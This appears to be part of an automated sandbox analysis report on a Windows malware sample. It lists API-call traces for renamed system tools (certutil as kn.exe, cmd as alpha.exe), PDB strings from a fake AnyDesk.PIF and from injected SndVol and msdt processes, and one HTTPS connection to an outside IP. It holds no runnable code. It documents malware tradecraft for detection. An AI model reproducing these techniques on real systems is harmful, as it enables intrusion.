          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68544FF64 NCryptGetProperty,#359,NCryptGetProperty,CertEnumCertificatesInStore,CertFindCertificateInStore,CertFreeCertificateContext,CertEnumCertificatesInStore,CertFreeCertificateContext,CertCloseStore,CertCloseStore,#357,7_2_00007FF68544FF64
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685515FF0 CryptDecodeObjectEx,CryptDecodeObjectEx,7_2_00007FF685515FF0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685445FE8 #357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,7_2_00007FF685445FE8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685515AA8 CryptDecodeObjectEx,7_2_00007FF685515AA8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854DFA84 LocalAlloc,#357,memmove,CryptDecrypt,GetLastError,#357,LocalFree,7_2_00007FF6854DFA84
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854CBA50 CryptSignCertificate,SetLastError,7_2_00007FF6854CBA50
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B1A44 CryptContextAddRef,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,7_2_00007FF6854B1A44
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685443A40 LocalFree,LocalFree,strcmp,#357,strcmp,LocalFree,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,LocalFree,strcmp,CryptDecodeObject,strcmp,LocalFree,strcmp,GetLastError,#357,LocalFree,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,GetLastError,#357,strcmp,strcmp,GetLastError,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,GetLastError,strcmp,strcmp,strcmp,strcmp,#357,#357,CryptDecodeObject,GetLastError,GetLastError,strcmp,LocalFree,strcmp,LocalFree,GetLastError,strcmp,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF685443A40
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B7A70 wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,NCryptSignHash,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,#357,_CxxThrowException,_CxxThrowException,NCryptSecretAgreement,#205,#357,#357,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,NCryptDeriveKey,#205,#359,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF6854B7A70
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854C9A58 #357,#357,#210,#357,SetWindowTextW,SetFocus,SendMessageW,SendMessageW,LocalAlloc,#357,#357,LocalFree,UpdateWindow,CoInitialize,LoadCursorW,SetCursor,LoadCursorW,SetCursor,SetFocus,SetWindowTextW,SetFocus,#357,SetFocus,SendMessageW,#357,LocalFree,LocalFree,LocalFree,CryptUIDlgFreeCAContext,CoUninitialize,7_2_00007FF6854C9A58
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685473B14 NCryptIsKeyHandle,CryptGetUserKey,GetLastError,#357,#357,#357,NCryptIsKeyHandle,#357,#357,LocalFree,CryptDestroyKey,7_2_00007FF685473B14
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854A9AF8 CertCloseStore,CertCloseStore,CryptMsgClose,LocalFree,LocalFree,NCryptFreeObject,7_2_00007FF6854A9AF8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685447988 CryptFindOIDInfo,#357,CryptFindOIDInfo,#357,GetLastError,#357,GetLastError,#357,LocalFree,7_2_00007FF685447988
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549597C GetLastError,CryptEncodeObjectEx,GetLastError,#357,7_2_00007FF68549597C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68550B980 #357,CryptFindOIDInfo,#359,GetLastError,#357,#359,CryptGetProvParam,memset,CryptGetProvParam,CryptFindOIDInfo,#357,GetLastError,#357,CryptReleaseContext,BCryptFreeBuffer,7_2_00007FF68550B980
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549B950 I_CryptGetLruEntryData,#357,7_2_00007FF68549B950
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68546F944 CryptDecodeObject,GetLastError,#357,7_2_00007FF68546F944
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854D9970 LocalAlloc,#357,LocalAlloc,CertGetEnhancedKeyUsage,GetLastError,#358,LocalFree,LocalFree,GetLastError,strcmp,#357,CryptFindOIDInfo,LocalFree,7_2_00007FF6854D9970
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854EBA14 NCryptIsKeyHandle,#357,CryptGetProvParam,GetLastError,NCryptFreeObject,7_2_00007FF6854EBA14
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549B9CC I_CryptWalkAllLruCacheEntries,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,I_CryptWalkAllLruCacheEntries,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,7_2_00007FF68549B9CC
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68543F9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree,7_2_00007FF68543F9B8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854A1C84 GetLastError,#357,CryptVerifyCertificateSignature,GetLastError,#357,LocalFree,#357,LocalFree,7_2_00007FF6854A1C84
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685451C50 BCryptQueryProviderRegistration,#360,#357,BCryptFreeBuffer,7_2_00007FF685451C50
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685515C54 CryptDecodeObjectEx,CryptDecodeObjectEx,7_2_00007FF685515C54
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685463C60 CryptExportPublicKeyInfo,GetLastError,#357,LocalAlloc,CryptExportPublicKeyInfo,GetLastError,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,CertCreateCertificateContext,GetLastError,#357,#357,CertComparePublicKeyInfo,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,CertSetCTLContextProperty,GetLastError,#357,#357,#358,#358,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF685463C60
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854DFD2C CryptDecryptMessage,GetLastError,#357,7_2_00007FF6854DFD2C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854CDD1C #357,strcmp,GetLastError,CryptHashCertificate,GetLastError,LocalAlloc,memmove,LocalFree,7_2_00007FF6854CDD1C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854A5CE8 #357,CertOpenStore,GetLastError,CertFindCertificateInStore,GetLastError,#359,LocalFree,CertFreeCertificateContext,CertCloseStore,CryptVerifyCertificateSignature,GetLastError,#357,7_2_00007FF6854A5CE8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854DFB94 #357,CryptFindOIDInfo,LocalAlloc,CryptEncryptMessage,GetLastError,LocalFree,#357,7_2_00007FF6854DFB94
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68543BB80 #357,NCryptIsKeyHandle,#357,LocalFree,LocalFree,7_2_00007FF68543BB80
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685515B90 CryptDecodeObjectEx,memmove,7_2_00007FF685515B90
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685415BA4 #357,NCryptIsKeyHandle,strcmp,GetLastError,strcmp,GetLastError,SysAllocStringByteLen,#357,SysFreeString,#359,LocalAlloc,#357,GetLastError,GetLastError,GetLastError,#357,LocalFree,LocalFree,LocalFree,SysFreeString,CertFreeCertificateContext,LocalFree,LocalFree,CryptReleaseContext,7_2_00007FF685415BA4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854BFB50 CryptExportPublicKeyInfo,GetLastError,#357,LocalAlloc,#357,CryptExportPublicKeyInfo,GetLastError,GetLastError,#357,#357,CertFindExtension,LocalAlloc,#357,memmove,#357,#357,#357,#357,#357,CAFindCertTypeByName,CAGetCertTypeExtensions,#357,#358,CertFindExtension,#357,LocalAlloc,memmove,memmove,#357,#357,GetLastError,#357,CertFindExtension,#357,GetLastError,#357,CryptSignAndEncodeCertificate,GetLastError,#357,LocalAlloc,CryptSignAndEncodeCertificate,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CAFreeCertTypeExtensions,CACloseCertType,7_2_00007FF6854BFB50
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854EBB50 NCryptIsKeyHandle,#359,CertCreateCertificateContext,GetLastError,LocalFree,CryptGetKeyParam,GetLastError,#358,LocalAlloc,#357,CryptGetKeyParam,GetLastError,#357,7_2_00007FF6854EBB50
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E5B44 CertFindExtension,#357,CryptDecodeObject,GetLastError,7_2_00007FF6854E5B44
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68547BB38 #357,CryptVerifyCertificateSignatureEx,GetLastError,#357,memcmp,GetSystemTimeAsFileTime,CompareFileTime,CompareFileTime,CompareFileTime,#357,#358,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF68547BB38
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E7B60 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptFindOIDInfo,LocalAlloc,#357,memmove,CryptReleaseContext,7_2_00007FF6854E7B60
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68546FC34 memset,#357,CryptDecodeObject,GetLastError,LocalAlloc,#357,memmove,memset,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF68546FC34
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68544FC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357,7_2_00007FF68544FC20
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685439BC8 #357,strcmp,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,CryptDecodeObject,GetLastError,strcmp,strcmp,strcmp,strcmp,GetLastError,strcmp,CryptDecodeObject,GetLastError,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,LocalFree,strcmp,SysFreeString,#357,#357,strcmp,SysFreeString,#357,SysFreeString,GetLastError,strcmp,LocalFree,LocalFree,CryptDecodeObject,strcmp,strcmp,strcmp,SysFreeString,LocalFree,7_2_00007FF685439BC8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854BBBC0 wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,CryptSignHashW,#205,GetLastError,#357,#359,#357,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,7_2_00007FF6854BBBC0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B3BEB _CxxThrowException,_CxxThrowException,_CxxThrowException,CryptExportKey,#205,GetLastError,#357,#357,#357,#357,SetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF6854B3BEB
          Source: unknown HTTPS traffic detected: 185.102.77.43:443 -> 192.168.2.8:49706 version: TLS 1.2
          Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: SndVol.pdbGCTL source: explorer.exe, 00000012.00000002.3881344388.000000000FF7F000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000014.00000002.3865958684.000000000538F000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 00000014.00000002.3863849789.00000000031D4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: msdt.pdbGCTL source: SndVol.exe, 00000011.00000003.1624243350.0000000034C51000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000011.00000002.1654717292.0000000034D50000.00000040.10000000.00040000.00000000.sdmp, SndVol.exe, 00000011.00000003.1624334752.0000000002C88000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000014.00000002.3863629531.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: easinvoker.pdb source: AnyDesk.PIF, AnyDesk.PIF, 0000000A.00000002.1535579882.0000000002D6E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1549903683.0000000020BDF000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1446631582.000000007F910000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1549903683.0000000020BA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1445368322.000000007FB20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000004.00000000.1420892123.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1424825690.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.1431655568.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.1443242487.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1444138946.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1444936141.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000000.1445328763.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000002.1446532317.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, esentutl.exe, 00000010.00000003.1521126197.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.16.dr, alpha.exe.3.dr
          Source: Binary string: wntdll.pdbUGP source: SndVol.exe, 00000011.00000003.1532906230.00000000345A4000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000011.00000002.1653350692.0000000034900000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000011.00000002.1653350692.0000000034A9E000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000011.00000003.1534972094.0000000034751000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000014.00000002.3865157782.0000000004FDE000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000014.00000002.3865157782.0000000004E40000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000014.00000003.1627063095.0000000004C95000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000014.00000003.1624680480.0000000004AC8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: SndVol.exe, 00000011.00000003.1532906230.00000000345A4000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000011.00000002.1653350692.0000000034900000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000011.00000002.1653350692.0000000034A9E000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000011.00000003.1534972094.0000000034751000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000014.00000002.3865157782.0000000004FDE000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000014.00000002.3865157782.0000000004E40000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000014.00000003.1627063095.0000000004C95000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000014.00000003.1624680480.0000000004AC8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: certutil.pdb source: kn.exe, 00000007.00000002.1429457981.00007FF68552E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000000.1425526307.00007FF68552E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1434200373.00007FF68552E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1442396876.00007FF68552E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr
          Source: Binary string: easinvoker.pdbH source: AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: cmd.pdb source: alpha.exe, 00000004.00000000.1420892123.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1424825690.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.1431655568.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.1443242487.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1444138946.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1444936141.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000000.1445328763.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000002.1446532317.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, esentutl.exe, 00000010.00000003.1521126197.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.16.dr, alpha.exe.3.dr
          Source: Binary string: easinvoker.pdbGCTL source: AnyDesk.PIF, 0000000A.00000003.1446334242.00000000029F1000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1524106394.00000000219CF000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1535579882.0000000002D6E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1549903683.0000000020BDF000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1446631582.000000007F910000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1535026723.0000000002C28000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1549903683.0000000020BA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1445368322.000000007FB20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1524106394.0000000021A00000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: msdt.pdb source: SndVol.exe, 00000011.00000003.1624243350.0000000034C51000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000011.00000002.1654717292.0000000034D50000.00000040.10000000.00040000.00000000.sdmp, SndVol.exe, 00000011.00000003.1624334752.0000000002C88000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000014.00000002.3863629531.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: certutil.pdbGCTL source: kn.exe, 00000007.00000002.1429457981.00007FF68552E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000000.1425526307.00007FF68552E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1434200373.00007FF68552E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1442396876.00007FF68552E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr
          Source: Binary string: SndVol.pdb source: explorer.exe, 00000012.00000002.3881344388.000000000FF7F000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000014.00000002.3865958684.000000000538F000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 00000014.00000002.3863849789.00000000031D4000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF6E943823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,4_2_00007FF6E943823C
          Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF6E9432978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,4_2_00007FF6E9432978
          Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF6E9421560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,4_2_00007FF6E9421560
          Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF6E94235B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,4_2_00007FF6E94235B8
          Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF6E9447B4C FindFirstFileW,FindNextFileW,FindClose,4_2_00007FF6E9447B4C
          Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF6E943823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,6_2_00007FF6E943823C
          Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF6E9432978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,6_2_00007FF6E9432978
          Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF6E9421560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,6_2_00007FF6E9421560
          Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF6E94235B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,6_2_00007FF6E94235B8
          Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF6E9447B4C FindFirstFileW,FindNextFileW,FindClose,6_2_00007FF6E9447B4C
          Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF68548C6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,7_2_00007FF68548C6F8
          Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF6854F234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,7_2_00007FF6854F234C
          Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF6854F3100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,7_2_00007FF6854F3100
          Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF6854F10C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,7_2_00007FF6854F10C4
          Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF6854F6F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,7_2_00007FF6854F6F80
          Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF6854D3674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,7_2_00007FF6854D3674
          Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF68549D4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,7_2_00007FF68549D4A4
          Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF68545D440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF68545D440
          Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF68549B3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,7_2_00007FF68549B3D8
          Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF685495E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,7_2_00007FF685495E58
          Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF6854F1B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,7_2_00007FF6854F1B04
          Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF6854F19F8 #359,FindFirstFileW,FindNextFileW,FindClose,7_2_00007FF6854F19F8
          Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF68549DBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,7_2_00007FF68549DBC0
          Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 10_2_02D45908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,10_2_02D45908
          Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF6E943823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,11_2_00007FF6E943823C
          Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF6E9432978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,11_2_00007FF6E9432978
          Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF6E9421560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,11_2_00007FF6E9421560
